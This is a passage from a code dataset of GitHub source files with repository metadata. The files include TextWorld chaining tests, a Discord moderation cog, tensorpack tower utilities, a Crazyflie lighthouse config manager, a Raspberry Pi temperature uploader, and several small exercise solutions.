# 15. take/s(P, room, s_0, o_0, I) -> go/east(P, r_0, room)\n # 16. take/s(P, room, s_0, o_0, I) -> go/east(P, r_0, room) -> open/d(P, r_0, d_0, room)\n # 17. take/s(P, room, s_0, o_0, I) -> go/west(P, r_0, room)\n # 18. take/s(P, room, s_0, o_0, I) -> go/west(P, r_0, room) -> open/d(P, r_0, d_0, room)\n\n\ndef test_backward_chaining():\n P = Variable(\"P\", \"P\")\n room = Variable(\"room\", \"r\")\n kitchen = Variable(\"kitchen\", \"r\")\n state = State(KnowledgeBase.default().logic, [\n Proposition(\"at\", [P, room]),\n Proposition(\"north_of\", [kitchen, room]),\n Proposition(\"south_of\", [room, kitchen]),\n ])\n\n options = ChainingOptions()\n options.backward = True\n options.max_depth = 2\n options.max_length = 2\n options.subquests = True\n options.create_variables = True\n options.rules_per_depth = [\n [KnowledgeBase.default().rules[\"take/c\"], KnowledgeBase.default().rules[\"take/s\"]],\n [KnowledgeBase.default().rules[\"open/c\"]],\n ]\n options.restricted_types = {\"d\"}\n\n chains = list(get_chains(state, options))\n assert len(chains) == 3\n\n options = ChainingOptions()\n options.backward = True\n options.max_depth = 3\n options.max_length = 3\n options.subquests = True\n options.create_variables = True\n options.rules_per_depth = [\n [KnowledgeBase.default().rules[\"put\"]],\n [KnowledgeBase.default().rules[\"go/north\"]],\n [KnowledgeBase.default().rules[\"take/c\"]],\n ]\n options.restricted_types = {\"d\"}\n\n chains = list(get_chains(state, options))\n assert len(chains) == 3\n\n\ndef test_parallel_quests():\n logic = GameLogic.parse(\"\"\"\n type foo {\n rules {\n do_a :: not_a(foo) & $not_c(foo) -> a(foo);\n do_b :: not_b(foo) & $not_c(foo) -> b(foo);\n do_c :: $a(foo) & $b(foo) & not_c(foo) -> c(foo);\n }\n\n constraints {\n a_or_not_a :: a(foo) & not_a(foo) -> fail();\n b_or_not_b :: b(foo) & not_b(foo) -> fail();\n c_or_not_c :: c(foo) & not_c(foo) -> fail();\n }\n }\n \"\"\")\n kb = KnowledgeBase(logic, \"\")\n\n state = State(kb.logic, [\n Proposition.parse(\"a(foo)\"),\n Proposition.parse(\"b(foo)\"),\n Proposition.parse(\"c(foo)\"),\n ])\n\n options = ChainingOptions()\n options.backward = True\n options.kb = kb\n\n options.max_depth = 3\n options.max_breadth = 1\n options.max_length = 3\n chains = list(get_chains(state, options))\n assert len(chains) == 2\n\n options.max_breadth = 2\n chains = list(get_chains(state, options))\n assert len(chains) == 3\n\n options.min_breadth = 2\n chains = list(get_chains(state, options))\n assert len(chains) == 1\n assert len(chains[0].actions) == 3\n assert chains[0].nodes[0].depth == 2\n assert chains[0].nodes[0].breadth == 2\n assert chains[0].nodes[0].parent == chains[0].nodes[2]\n assert chains[0].nodes[1].depth == 2\n assert chains[0].nodes[1].breadth == 1\n assert chains[0].nodes[1].parent == chains[0].nodes[2]\n assert chains[0].nodes[2].depth == 1\n assert chains[0].nodes[2].breadth == 1\n assert chains[0].nodes[2].parent is None\n\n options.min_breadth = 1\n options.create_variables = True\n state = State(kb.logic)\n chains = list(get_chains(state, options))\n assert len(chains) == 5\n\n\ndef test_parallel_quests_navigation():\n logic = GameLogic.parse(\"\"\"\n type P {\n }\n\n type I {\n }\n\n type r {\n rules {\n move :: at(P, r) & $free(r, r') -> at(P, r');\n }\n\n constraints {\n atat :: at(P, r) & at(P, r') -> fail();\n }\n }\n\n type o {\n rules {\n take :: $at(P, r) & at(o, r) -> in(o, I);\n }\n\n constraints {\n inat :: in(o, I) & at(o, r) -> fail();\n }\n }\n\n type flour : o {\n }\n\n type eggs : o {\n }\n\n type cake {\n rules {\n bake :: in(flour, I) & in(eggs, I) -> in(cake, I) & in(flour, cake) & in(eggs, cake);\n }\n\n constraints {\n inincake :: in(o, I) & in(o, cake) -> fail();\n atincake :: at(o, r) & in(o, cake) -> fail();\n }\n }\n \"\"\")\n kb = KnowledgeBase(logic, \"\")\n\n state = State(kb.logic, [\n Proposition.parse(\"at(P, r3: r)\"),\n Proposition.parse(\"free(r2: r, r3: r)\"),\n Proposition.parse(\"free(r1: r, r2: r)\"),\n ])\n\n bake = [kb.logic.rules[\"bake\"]]\n non_bake = [r for r in kb.logic.rules.values() if r.name != \"bake\"]\n\n options = ChainingOptions()\n options.backward = True\n options.create_variables = True\n options.min_depth = 3\n options.max_depth = 3\n options.min_breadth = 2\n options.max_breadth = 2\n options.max_length = 6\n options.kb = kb\n options.rules_per_depth = [bake, non_bake, non_bake]\n options.restricted_types = {\"P\", \"r\"}\n chains = list(get_chains(state, options))\n assert len(chains) == 2\n","repo_name":"microsoft/TextWorld","sub_path":"textworld/generator/tests/test_chaining.py","file_name":"test_chaining.py","file_ext":"py","file_size_in_byte":10931,"program_lang":"python","lang":"en","doc_type":"code","stars":1102,"dataset":"github-code","pt":"21"} +{"seq_id":"17526932204","text":"#!/usr/bin/env python3\n\n\"\"\"Functions which print and analyze computed results.\"\"\"\n\nimport numpy\n\n\ndef print_results(neighbors, words, out_file):\n \"\"\"\n Prints the computed results to an output file.\n\n neighbors - A list of lists containing the neighbors of each word.\n words - The full list of words.\n out_file - The file on which the results will be written.\n \"\"\"\n\n nwords = len(neighbors)\n\n for i, neighbors_i in enumerate(neighbors):\n out_file.write(\"%s: \" % words[i])\n out_file.write(\" \".join(sorted([words[j] for j in neighbors_i])))\n out_file.write(\"\\n\")\n out_file.write(\"\\n\")\n\n\ndef print_stats(neighbors, min_wlen, max_dist, stats_file):\n \"\"\"\n Analyzes and prints basic statistics about the results obtained.\n\n neighbors - A list of lists containing the neighbors of each word.\n min_wlen - The smallest word length considered (smaller words are ignored).\n max_dist - The maximum considered distance between words.\n stats_file - The file on which the statistics data will be written.\n \"\"\"\n\n nwords = len(neighbors)\n\n # counters contain the number of neighbors for each word\n counters = numpy.array([len(x) for x in neighbors], dtype=numpy.int8)\n\n stats_file.write(\"Number of words analyzed: %d\\n\" % nwords)\n stats_file.write(\"Smallest word length considered: %d\\n\" % min_wlen)\n stats_file.write(\n \"Number of words within distance %d from any word\\n\" % max_dist)\n stats_file.write(\"\\tmean : %f\\n\" % numpy.mean(counters))\n stats_file.write(\"\\tstd.dev.: %f\\n\\n\" % numpy.std(counters))\n\n\ndef print_histogram(neighbors, plot_hist, hist_file):\n \"\"\"\n Writes all histogram data (neighbor counter frequency) to a file.\n\n neighbors - A list of lists containing the neighbors of each word.\n plot_hist - True if the final histogram should be plotted, False otherwise.\n hist_file - The file on which the histogram data will be written.\n \"\"\"\n\n nwords = len(neighbors)\n\n # counters contain the number of neighbors for each word\n counters = numpy.array([len(x) for x in neighbors], dtype=numpy.int8)\n\n # we need at least one bin (otherwise an exception will be thrown)\n nbins = max(1, max(counters) - min(counters))\n\n hist, bins = numpy.histogram(counters, bins=nbins, density=True)\n\n for x, y in zip(bins, hist):\n hist_file.write(\"%d %f\\n\" % (x, y))\n\n if plot_hist:\n import matplotlib.pyplot as pyplot\n\n width = 0.7 * (bins[1] - bins[0])\n center = (bins[:-1] + bins[1:]) / 2 - 0.5\n pyplot.bar(center, hist, align=\"center\", width=width)\n pyplot.show()\n","repo_name":"dassencio/langcmp","sub_path":"results.py","file_name":"results.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"34291875517","text":"import json\nfrom itertools import cycle\nimport discord\nfrom discord.ext import commands, tasks\nimport random\nfrom discord.ext.commands.cooldowns import BucketType\nfrom discord.utils import get\nfrom discord.ext import commands\nimport time\nimport aiohttp\nfrom discord import Webhook, AsyncWebhookAdapter\nimport sys, traceback\n\n\nclass Admin_Commands(commands.Cog):\n def __init__(self, client):\n self.client = client\n\n\n @commands.command()\n @commands.has_permissions(ban_members=True)\n @commands.bot_has_permissions(ban_members=True)\n async def ban(self, ctx, member: discord.Member, *, reason=None):\n await member.ban(reason=f\"Breeze Bot Ban - Responsible User : {ctx.author.name} | Reason : {reason}\")\n await ctx.send(f'Banned {member.mention}')\n\n\n @commands.command(aliases=[\"removeban\"])\n @commands.has_permissions(ban_members=True)\n @commands.bot_has_permissions(ban_members=True)\n async def unban(self, ctx, *, member):\n banned_users = await ctx.guild.bans()\n member_name, member_discriminator = member.split(\"#\")\n for ban_entry in banned_users:\n user = ban_entry.user\n\n if (user.name, user.discriminator) == (member_name, member_discriminator):\n await ctx.guild.unban(user)\n await ctx.send(f'Unbanned {user.name}#{user.discriminator}')\n\n\n @commands.command()\n @commands.has_permissions(kick_members=True)\n @commands.bot_has_permissions(kick_members=True)\n async def kick(self, ctx, member: discord.Member, *, reason=None):\n await member.kick(f\"Breeze Bot Kick - Responsible User : {ctx.author.name} | Reason : {reason}\")\n await ctx.send(f'{member.mention} was kicked! ')\n\n\n @commands.command(aliases=[\"changeprefix\", \"prefixchange\", \"newprefix\", \"new_prefix\"])\n @commands.has_permissions(administrator=True)\n @commands.bot_has_permissions(administrator=True)\n async def prefix(self, ctx, new_prefix):\n with open(\"prefixes.json\", 'r') as f:\n prefixes = json.load(f)\n prefixes[str(ctx.guild.id)] = new_prefix\n\n with open(\"prefixes.json\", \"w\") as f:\n json.dump(prefixes, f, indent=4)\n\n await ctx.send(f\"Prefix changed to {new_prefix}\")\n\n\n @commands.command(aliases=[\"send\"])\n @commands.has_permissions(manage_messages=True)\n @commands.bot_has_permissions(manage_messages=True)\n async def say(self, ctx, channel: discord.TextChannel = None, *, content: str):\n channel = channel if channel else ctx.channel\n await ctx.message.delete()\n await channel.send(content)\n\n\n @commands.command(aliases=[\"clear\"])\n @commands.has_permissions(manage_messages=True)\n @commands.bot_has_permissions(manage_messages=True)\n async def purge(self, ctx, *, amount=5):\n await ctx.message.delete()\n await ctx.channel.purge(limit=amount)\n\n\n @commands.command(aliases=[\"addrole\", \"removerole\"])\n @commands.has_permissions(manage_roles=True)\n @commands.bot_has_permissions(manage_roles=True)\n async def role(self, ctx, role: discord.Role, user: discord.Member):\n if role in user.roles:\n await user.remove_roles(role)\n else:\n await user.add_roles(role)\n\n\n @commands.command(aliases=[\"moveto\", \"move_to\", \"movechannel\", \"move_channel\"])\n @commands.has_permissions(administrator=True)\n @commands.bot_has_permissions(administrator=True)\n async def move(self, ctx, member: discord.Member, channel: discord.VoiceChannel):\n await ctx.message.delete()\n await member.move_to(channel, reason=None)\n\n\n @commands.command(aliases=[\"pm\"])\n @commands.has_permissions(administrator=True)\n @commands.bot_has_permissions(administrator=True)\n async def dm(self, ctx, member: discord.Member, *, text):\n await ctx.message.delete()\n await member.send(f\"Message from {ctx.author}: {text}\")\n\n\ndef setup(client):\n client.add_cog(Admin_Commands(client))\n","repo_name":"shabman/Breeze","sub_path":"cogs/Admin.py","file_name":"Admin.py","file_ext":"py","file_size_in_byte":3960,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"28064786446","text":"from django.conf.urls import url\n\nfrom redditalpha.api.decks import views\n\n\nurlpatterns = [\n url(r'^test$', views.test, name='test'), # yes, you can delete this\n url(r'^$', views.index, name='index'),\n url(r'^mine$', views.mine, name='mine'),\n url(r'^(?P\\d+)/delete$', views.delete, name='delete'),\n url(r'^(?P\\d+)/copy$', views.copy, name='copy'),\n url(r'^(?P\\d+)/favorite$', views.favorite, name='favorite'),\n url(r'^(?P\\d+)/upvote$', views.upvote, name='upvote'),\n url(r'^(?P\\d+)/downvote$', views.downvote, name='downvote'),\n url(r'^(?P\\d+)/notes$', views.notes, name='notes'),\n url(r'^(?P\\d+)/hand/starter$', views.hand_starter, name='hand_starter'),\n url(r'^(?P\\d+)/tags/add$', views.add_tag, name='add_tag'),\n url(r'^(?P\\d+)/tags/delete$', views.delete_tag, name='delete_tag'),\n]\n","repo_name":"kjg531/RA","sub_path":"redditalpha/api/decks/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"35745279832","text":"class BinaryTreeNode:\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n\ndef printdetailedTree(root):\n if root == None:\n return\n print(root.data, end=\" : \")\n if root.left:\n print(\"L:\", root.left.data, end=\" \")\n if root.right:\n print(\"R:\", root.right.data, end=\" \")\n print()\n\n printdetailedTree(root.left)\n printdetailedTree(root.right)\n\n\ndef takeInput():\n rootData = int(input())\n if rootData == -1 :\n return None\n\n root = BinaryTreeNode(rootData)\n leftTree = takeInput()\n righttree = takeInput()\n root.left = leftTree\n root.right = righttree\n\n return root\n\ndef numofLeafNodes(root):\n if root is None:\n return 0\n\n if root.left == None and root.right == None:\n return 1\n\n nleftleaf = numofLeafNodes(root.left)\n nrightleaf = numofLeafNodes(root.right)\n\n return nleftleaf + nrightleaf\n\nx = takeInput()\nprintdetailedTree(x)\nprint(numofLeafNodes(x))","repo_name":"jyotijauhari/DSA-questions-Python","sub_path":"11_00_tree/binaryTree/countNumofLeafNodes.py","file_name":"countNumofLeafNodes.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73036638133","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# File: tower.py\n# Author: Yuxin Wu \n\nimport tensorflow as tf\nimport re\nfrom ..utils.naming import PREDICT_TOWER\n\n__all__ = ['get_current_tower_context', 'TowerContext']\n\n_CurrentTowerContext = None\n\n\nclass TowerContext(object):\n \"\"\" A context where the current model is being built in. \"\"\"\n\n def __init__(self, tower_name, is_training=None):\n \"\"\"\n Args:\n tower_name (str): 'tower0', 'towerp0', or ''\n is_training (bool): if None, automatically determine from tower_name.\n \"\"\"\n self._name = tower_name\n if is_training is None:\n is_training = not self._name.startswith(PREDICT_TOWER)\n self._is_training = is_training\n\n @property\n def is_main_training_tower(self):\n return self.is_training and (self._name == '' or self._name == 'tower0')\n\n @property\n def is_main_tower(self):\n return self._name == '' or self._name == 'tower0'\n\n @property\n def is_training(self):\n return self._is_training\n\n @property\n def name(self):\n return self._name\n\n def get_variable_on_tower(self, *args, **kwargs):\n \"\"\"\n Get a variable for this tower specifically, without reusing, even if\n it is called under a ``reuse=True`` variable scope.\n\n Tensorflow doesn't allow us to disable reuse under a\n ``reuse=True`` scope. This method provides a work around.\n See https://www.tensorflow.org/versions/master/how_tos/variable_scope/index.html#basics-of-tfvariable-scope\n\n Args:\n args: same as ``tf.get_variable()``.\n \"\"\"\n with tf.variable_scope(self._name) as scope:\n with tf.variable_scope(scope, reuse=False):\n scope = tf.get_variable_scope()\n assert not scope.reuse\n return tf.get_variable(*args, **kwargs)\n\n def find_tensor_in_main_tower(self, graph, name):\n if self.is_main_tower:\n return graph.get_tensor_by_name(name)\n if name.startswith(PREDICT_TOWER):\n predict_tower_prefix = '{}[0-9]+/'.format(PREDICT_TOWER)\n newname = re.sub(predict_tower_prefix, '', name)\n try:\n return graph.get_tensor_by_name(newname)\n except KeyError:\n newname = re.sub(predict_tower_prefix, 'tower0/', name)\n return graph.get_tensor_by_name(newname)\n\n @staticmethod\n def get_predict_tower_name(towerid=0, prefix=''):\n \"\"\"\n Args:\n towerid(int): an integer, the id of this predict tower, usually\n used to choose the GPU id.\n prefix(str): an alphanumeric prefix.\n Returns:\n str: the final tower name used to create a predict tower.\n Currently it is ``PREDICT_TOWER + prefix + towerid``.\n \"\"\"\n assert prefix == '' or prefix.isalnum()\n return PREDICT_TOWER + prefix + str(towerid)\n\n def __enter__(self):\n global _CurrentTowerContext\n assert _CurrentTowerContext is None, \\\n \"Nesting TowerContext!\"\n _CurrentTowerContext = self\n # TODO enter name_scope(None) first\n if len(self._name):\n self._scope = tf.name_scope(self._name)\n return self._scope.__enter__()\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n global _CurrentTowerContext\n _CurrentTowerContext = None\n if len(self._name):\n self._scope.__exit__(exc_type, exc_val, exc_tb)\n return False\n\n def __str__(self):\n return \"TowerContext(name={}, is_training={})\".format(\n self._name, self._is_training)\n\n\ndef get_current_tower_context():\n global _CurrentTowerContext\n return _CurrentTowerContext\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/ppwwyyxx_tensorpack/tensorpack-master/tensorpack/tfutils/tower.py","file_name":"tower.py","file_ext":"py","file_size_in_byte":3800,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"41330548523","text":"# Written: 03-Apr-2020\n# https://www.hackerrank.com/challenges/polar-coordinates/problem\n\n# Enter your code here. Read input from STDIN. Print output to STDOUT\n\nimport cmath\n\nif __name__ == '__main__':\n z = input()\n print(abs(complex(z)))\n print(cmath.phase(complex(z)))","repo_name":"elmoallistair/hackerrank","sub_path":"Python/Math/Polar Coordinates.py","file_name":"Polar Coordinates.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"3136292911","text":"# importing PIL \nfrom PIL import Image \nimport cv2\nimport sys\nimport numpy\n\nprint(sys.argv[0]);\n\ndef canny():\n\t# read the image\n\timg = cv2.imread(sys.argv[1])\n\n\t# conver to gray scale\n\tgray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n\tblurred = cv2.GaussianBlur(gray, (7, 7), 0)\n\n\t# we found on of the best algorithms to detect the edges named: Canny\n\t# documentation: https://docs.opencv.org/3.1.0/da/d22/tutorial_py_canny.html\n\tedges = cv2.Canny(blurred, 35, 50)\n\n\tprint_image(edges)\n\ndef print_image(edges):\n\t# print the image\n\tA = numpy.squeeze(numpy.asarray(edges))\n\timg = Image.fromarray(A)\n\timg.save(sys.argv[2])\n\n\ndef edgeDetection():\n\t# structured forests and fast edge detection\n\n\t# 1. Load source color image\n\timg = cv2.imread(sys.argv[1])\n\n\t# 2. Convert source image to [0;1] range\n\tgray = numpy.divide(img, 255)\n\n\tprint_image(gray)\n\n\t# 3. Run main algorithm\n\t# cv::Mat edges(image.size(), image.type());\n\t# cv::Ptr pDollar =\n\t# cv::createStructuredEdgeDetection(modelFilename);\n\t# pDollar->detectEdges(image, edges);\n\t# 4. Show results\n\t# if ( outFilename == \"\" )\n\t# {\n\t# cv::namedWindow(\"edges\", 1);\n\t# cv::imshow(\"edges\", edges);\n\t# cv::waitKey(0);\n\t# }\n\t# else cv::imwrite(outFilename, 255*edges)\n\ncanny()\n\n\n","repo_name":"Sibel-Leila/glass-detection","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9382381369","text":"import math\nimport copy\n\nX = []\n\nwith open(\"0_Data.txt\") as fileInput:\n file = list(fileInput)\n\nfor line in file:\n C = line.strip()\n C = C.split()\n X.append(C)\n\ntab = \" \"\n\nclass directory(object):\n def __init__(self, name):\n self.files = []\n self.directories = []\n self.directorynames = []\n self.name = name\n \n def getSize(self):\n s = 0\n for i in self.files:\n s += i.getSize()\n for i in self.directories:\n s += i.getSize()\n return s\n \n def printDirectory(self, numIndents=0):\n s = \"\"\n for i in range(numIndents):\n s += tab\n print(s + \" - \" + self.name + \" (dir, total size = \" + str(self.getSize()) + \")\")\n for i in self.files:\n i.printFile(numIndents + 1)\n for i in self.directories:\n i.printDirectory(numIndents + 1)\n \n def addDirectory(self, location, name):\n l = copy.deepcopy(location)\n if len(l) != 1:\n l.pop(0)\n self.directories[self.directorynames.index(l[0])].addDirectory(l, name)\n else:\n self.directorynames.append(name)\n self.directories.append(directory(name))\n \n def addFile(self, location, name, size):\n l = copy.deepcopy(location)\n if len(l) != 1:\n l.pop(0)\n self.directories[self.directorynames.index(l[0])].addFile(l, name, size)\n else:\n self.files.append(file(name, size))\n \n def addSmallFiles(self, s=0):\n sui = 0\n if self.getSize() <= 100000:\n sui += self.getSize()\n for i in self.directories:\n sui += i.addSmallFiles(s = sui)\n return sui\n \n def allDirectorySizes(self):\n sizes = [self.getSize()]\n for i in self.directories:\n j = i.allDirectorySizes()\n for k in j:\n sizes.append(k)\n return sizes\n \n\nclass file(object):\n def __init__(self, name, size):\n self.name = name\n self.size = int(size) #im stupid lmao\n \n def getSize(self):\n return self.size\n \n def printFile(self, numIndents):\n s = \"\"\n for i in range(numIndents):\n s += tab\n print(s + \" - \" + self.name + \" (file, size = \" + str(self.size) + \")\")\n\nmain = directory(\"/\")\nlocation = []\n\nfor i in X:\n if i[0] == \"$\":\n if i[1] == \"cd\":\n if i[2] == \"..\":\n location.pop()\n else:\n location.append(i[2])\n else:\n if i[0] == \"dir\":\n main.addDirectory(location, i[1])\n else:\n main.addFile(location, i[1], i[0])\n\nmain.printDirectory()\nt = main.allDirectorySizes()\nminimum = 99999999\nrequirement = t[0] - 40000000\nfor i in t:\n if i >= requirement:\n if i < minimum:\n minimum = i\nprint(minimum)","repo_name":"skeole/AdventOfCode","sub_path":"07_NoSpaceLeftOnDevice.py","file_name":"07_NoSpaceLeftOnDevice.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"34196536537","text":"import time\n\nimport yaml\n\nfrom cflib.crazyflie.mem import LighthouseBsCalibration\nfrom cflib.crazyflie.mem import LighthouseBsGeometry\nfrom cflib.crazyflie.mem import LighthouseMemHelper\n\n\nclass LighthouseConfigFileManager:\n TYPE_ID = 'type'\n TYPE = 'lighthouse_system_configuration'\n VERSION_ID = 'version'\n VERSION = '1'\n GEOS_ID = 'geos'\n CALIBS_ID = 'calibs'\n SYSTEM_TYPE_ID = 'systemType'\n\n SYSTEM_TYPE_V1 = 1\n SYSTEM_TYPE_V2 = 2\n\n @staticmethod\n def write(file_name, geos={}, calibs={}, system_type=SYSTEM_TYPE_V2):\n file = open(file_name, 'w')\n with file:\n file_geos = {}\n for id, geo in geos.items():\n if geo.valid:\n file_geos[id] = geo.as_file_object()\n\n file_calibs = {}\n for id, calib in calibs.items():\n if calib.valid:\n file_calibs[id] = calib.as_file_object()\n\n data = {\n LighthouseConfigFileManager.TYPE_ID: LighthouseConfigFileManager.TYPE,\n LighthouseConfigFileManager.VERSION_ID: LighthouseConfigFileManager.VERSION,\n LighthouseConfigFileManager.SYSTEM_TYPE_ID: system_type,\n LighthouseConfigFileManager.GEOS_ID: file_geos,\n LighthouseConfigFileManager.CALIBS_ID: file_calibs\n }\n\n yaml.dump(data, file)\n\n @staticmethod\n def read(file_name):\n file = open(file_name, 'r')\n with file:\n data = yaml.safe_load(file)\n\n if LighthouseConfigFileManager.TYPE_ID not in data:\n raise Exception('Type field missing')\n\n if data[LighthouseConfigFileManager.TYPE_ID] != LighthouseConfigFileManager.TYPE:\n raise Exception('Unsupported file type')\n\n if LighthouseConfigFileManager.VERSION_ID not in data:\n raise Exception('Version field missing')\n\n if data[LighthouseConfigFileManager.VERSION_ID] != LighthouseConfigFileManager.VERSION:\n raise Exception('Unsupported file version')\n\n result_system_type = LighthouseConfigFileManager.SYSTEM_TYPE_V2\n if LighthouseConfigFileManager.SYSTEM_TYPE_ID in data:\n result_system_type = data[LighthouseConfigFileManager.SYSTEM_TYPE_ID]\n\n result_geos = {}\n result_calibs = {}\n\n if LighthouseConfigFileManager.GEOS_ID in data:\n for id, geo in data[LighthouseConfigFileManager.GEOS_ID].items():\n result_geos[id] = LighthouseBsGeometry.from_file_object(geo)\n\n if LighthouseConfigFileManager.CALIBS_ID in data:\n for id, calib in data[LighthouseConfigFileManager.CALIBS_ID].items():\n result_calibs[id] = LighthouseBsCalibration.from_file_object(calib)\n\n return result_geos, result_calibs, result_system_type\n\n\nclass LighthouseConfigWriter:\n \"\"\"\n This class is used to write system config data to the Crazyflie RAM and persis to permanent storage\n \"\"\"\n\n def __init__(self, cf, nr_of_base_stations=16):\n self._cf = cf\n self._helper = LighthouseMemHelper(cf)\n self._data_stored_cb = None\n self._geos_to_write = None\n self._geos_to_persist = []\n self._calibs_to_persist = []\n self._write_failed_for_one_or_more_objects = False\n self._nr_of_base_stations = nr_of_base_stations\n\n def write_and_store_config(self, data_stored_cb, geos=None, calibs=None, system_type=None):\n \"\"\"\n Transfer geometry and calibration data to the Crazyflie and persist to permanent storage.\n The callback is called when done.\n If geos or calibs is None, no data will be written for that data type.\n If geos or calibs is a dictionary, the values for the base stations in the dictionary will\n transfered to the Crazyflie, data for all other base stations will be invalidated.\n \"\"\"\n if self._data_stored_cb is not None:\n raise Exception('Write already in prgress')\n self._data_stored_cb = data_stored_cb\n\n self._cf.loc.receivedLocationPacket.add_callback(self._received_location_packet)\n\n self._geos_to_write = self._prepare_geos(geos)\n self._calibs_to_write = self._prepare_calibs(calibs)\n\n self._geos_to_persist = []\n if self._geos_to_write is not None:\n self._geos_to_persist = list(range(self._nr_of_base_stations))\n\n self._calibs_to_persist = []\n if self._calibs_to_write is not None:\n self._calibs_to_persist = list(range(self._nr_of_base_stations))\n\n self._write_failed_for_one_or_more_objects = False\n\n if system_type is not None:\n # Change system type first as this will erase calib and geo data in the CF.\n # Changing system type may trigger a lengthy operation (up to 0.5 s) if the persistant memory requires\n # defrag. Setting a param is an asynchronous operataion, and it is not possible to know if the system\n # swich is finished before we continue.\n self._cf.param.set_value('lighthouse.systemType', system_type)\n\n # We add a sleep here to make sure the change of system type is finished. It is dirty but will have to\n # do for now. A more propper solution would be to add support for Remote Procedure Calls (RPC) with\n # synchronous function calls.\n time.sleep(0.8)\n\n self._next()\n\n def write_and_store_config_from_file(self, data_stored_cb, file_name):\n \"\"\"\n Read system configuration data from file and write/persist to the Crazyflie.\n Geometry and calibration data for base stations that are not in the config file will be invalidated.\n \"\"\"\n geos, calibs, system_type = LighthouseConfigFileManager.read(file_name)\n self.write_and_store_config(data_stored_cb, geos=geos, calibs=calibs, system_type=system_type)\n\n def _next(self):\n if self._geos_to_write is not None:\n self._helper.write_geos(self._geos_to_write, self._upload_done)\n self._geos_to_write = None\n return\n\n if self._calibs_to_write is not None:\n self._helper.write_calibs(self._calibs_to_write, self._upload_done)\n self._calibs_to_write = None\n return\n\n if len(self._geos_to_persist) > 0 or len(self._calibs_to_persist) > 0:\n self._cf.loc.send_lh_persist_data_packet(self._geos_to_persist, self._calibs_to_persist)\n self._geos_to_persist = []\n self._calibs_to_persist = []\n return\n\n tmp_callback = self._data_stored_cb\n self._data_stored_cb = None\n if tmp_callback is not None:\n tmp_callback(not self._write_failed_for_one_or_more_objects)\n\n def _upload_done(self, sucess):\n if not sucess:\n self._write_failed_for_one_or_more_objects = True\n self._next()\n\n def _received_location_packet(self, packet):\n # New geo data has been written and stored in the CF\n if packet.type == self._cf.loc.LH_PERSIST_DATA:\n self._next()\n\n def _prepare_geos(self, geos):\n result = None\n\n if geos is not None:\n result = dict(geos)\n\n # Pad for base stations without data\n empty_geo = LighthouseBsGeometry()\n for id in range(self._nr_of_base_stations):\n if id not in result:\n result[id] = empty_geo\n\n return result\n\n def _prepare_calibs(self, calibs):\n result = None\n\n if calibs is not None:\n result = dict(calibs)\n\n # Pad for base stations without data\n empty_calib = LighthouseBsCalibration()\n for id in range(self._nr_of_base_stations):\n if id not in result:\n result[id] = empty_calib\n\n return result\n","repo_name":"bitcraze/crazyflie-lib-python","sub_path":"cflib/localization/lighthouse_config_manager.py","file_name":"lighthouse_config_manager.py","file_ext":"py","file_size_in_byte":7933,"program_lang":"python","lang":"en","doc_type":"code","stars":227,"dataset":"github-code","pt":"21"} +{"seq_id":"69900084854","text":"import sys\nfrom sense_hat import SenseHat\nimport time\nimport requests\nimport json\n\nsense = SenseHat()\ntemp_adjust = 16\nadd_meting_url = \"http://Server_URL/AddTempMeting\"\nmeting_time = 10\n\ndef saveGUID(guid_to_save):\n f = open(\"guid.txt\", \"w\")\n f.write(guid_to_save)\n f.close()\n \ndef getGUID():\n f = open(\"guid.txt\", \"r\")\n line = f.read()\n print(f.read())\n f.close()\n line = line.strip('\\n')\n line = line.strip('\\t')\n return line\n\nguid = getGUID()\n\nwhile True:\n time_begin = time.time()\n value = round(sense.get_temperature()-temp_adjust, 1)\n print (guid)\n \n url = add_meting_url+\"?meting=\"+str(value)+\"&guid=\"+str(guid)\n \n\n response = requests.post(url)\n res_json = json.loads(response.text)\n for key, value in res_json.items():\n if (key == 'guid'):\n guid = value\n saveGUID(value)\n print (\"Successfully added temp\")\n else:\n print (\"Error: \" + value)\n \n time_done = time.time()\n time_exp = time_done - time_begin\n time.sleep(meting_time - time_exp)\n \n\n\n","repo_name":"Joehoel/nerdygadgets","sub_path":"config/migrations/NerdyGadgets.py","file_name":"NerdyGadgets.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36676813382","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('' , views.home , name='home'),\n path('category/' , views.home , name='post_by_category'),\n path('category//' , views.details_page , name='post_details'),\n path('account/create_an_account/' , views.sign_up , name='sign_up'),\n path('account/login' , views.sign_in , name='sign_in'),\n path('sign_out' , views.logoutView , name='sign_out'),\n path('about/' , views.about , name='about'),\n path('search/' , views.search , name='search'),\n path('contact/' , views.contact , name=\"contact\"),\n]\n\n","repo_name":"hassan-ajdour-99/Devfly","sub_path":"web_project/MainApp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38089232932","text":"import random\nimport outputcontroller\n\n\nclass Creature:\n\n def __init__(self, name, hp, mana, strength, dexterity, intelligence):\n self.name = name\n self.hp = hp\n self.mana = mana\n self.strength = strength\n self.dexterity = dexterity\n self.intelligence = 